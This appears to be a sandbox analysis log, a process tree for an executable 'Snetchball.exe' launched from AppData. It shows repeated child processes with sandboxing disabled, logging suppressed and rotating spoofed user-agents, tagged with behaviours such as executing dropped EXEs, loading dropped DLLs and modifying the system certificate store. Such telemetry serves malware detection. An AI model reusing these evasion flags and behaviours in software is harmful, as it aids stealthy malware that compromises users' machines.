C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2724,7541734360235849457,10510411150285218548,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; U; Android 10; PPA-LX2 Build/HUAWEIPPA-LX2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.108 Mobile Safari/537.36 OPR/63.0.2254.62316" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:137⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2724,7541734360235849457,10510411150285218548,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --service-sandbox-type=network --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; U; Android 10; PPA-LX2 Build/HUAWEIPPA-LX2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.108 Mobile Safari/537.36 OPR/63.0.2254.62316" --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3132 /prefetch:837⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"36⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"36⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"36⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"36⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"36⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2880,17914812311879297345,6599801019387025352,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:135⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2880,17914812311879297345,6599801019387025352,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --service-sandbox-type=network --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36" --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3136 /prefetch:835⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"34⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"34⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"34⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"34⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"34⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2836,14059417961094652827,18027198836368525221,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:133⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2836,14059417961094652827,18027198836368525221,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --service-sandbox-type=network --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36" --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3216 /prefetch:833⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"32⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"32⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"32⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"32⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"32⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2872,8897377371215448603,14463100497325208262,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4476.0 Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:131⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2872,8897377371215448603,14463100497325208262,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --service-sandbox-type=network --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4476.0 Safari/537.36" --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3172 /prefetch:831⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"30⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"30⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"30⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"30⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"30⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2840,14858862295879299685,17295636674637847351,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.105 Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:129⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"28⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"28⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"28⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"28⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"28⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2860,15899929388945168781,7419223888666148994,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:127⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"26⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"26⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"26⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"26⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"26⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2856,3956465883134394956,5043585880306443708,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:125⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2856,3956465883134394956,5043585880306443708,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --service-sandbox-type=network --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3180 /prefetch:825⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"24⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"24⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"24⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"24⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"24⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2756,16605724862147668351,8184303886034974654,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:123⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"22⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"22⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"22⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"22⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"22⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2852,15955737643096916512,1540399912550750019,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:121⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"20⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2872,7264024172170132715,15312227009764169712,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 8.0; Galaxy Nexus Build/IMM76B; UCBrowser; ru-UA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.66 YaBrowser/21.2.6.68 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:119⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"18⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2848,11632107300355285355,4173813756744281303,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --service-sandbox-type=network --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.167 YaBrowser/22.7.4.957 Yowser/2.5 Safari/537.36" --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3204 /prefetch:817⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2848,11632107300355285355,4173813756744281303,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.167 YaBrowser/22.7.4.957 Yowser/2.5 Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:117⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"16⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"16⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"16⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"16⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"16⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2728,11684591958910206777,16695886110250067651,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:115⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"14⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2756,1678014076749500186,2742012632960583978,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/106.0.0.0" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:113⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2756,1678014076749500186,2742012632960583978,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --service-sandbox-type=network --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/106.0.0.0" --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3088 /prefetch:813⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"12⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2844,2794337326330680871,3290147657243974060,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/106.0.1347.0" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:111⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2920,11598328293229199253,10037162673382561336,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --service-sandbox-type=network --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3260 /prefetch:89⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2920,11598328293229199253,10037162673382561336,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:19⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
-
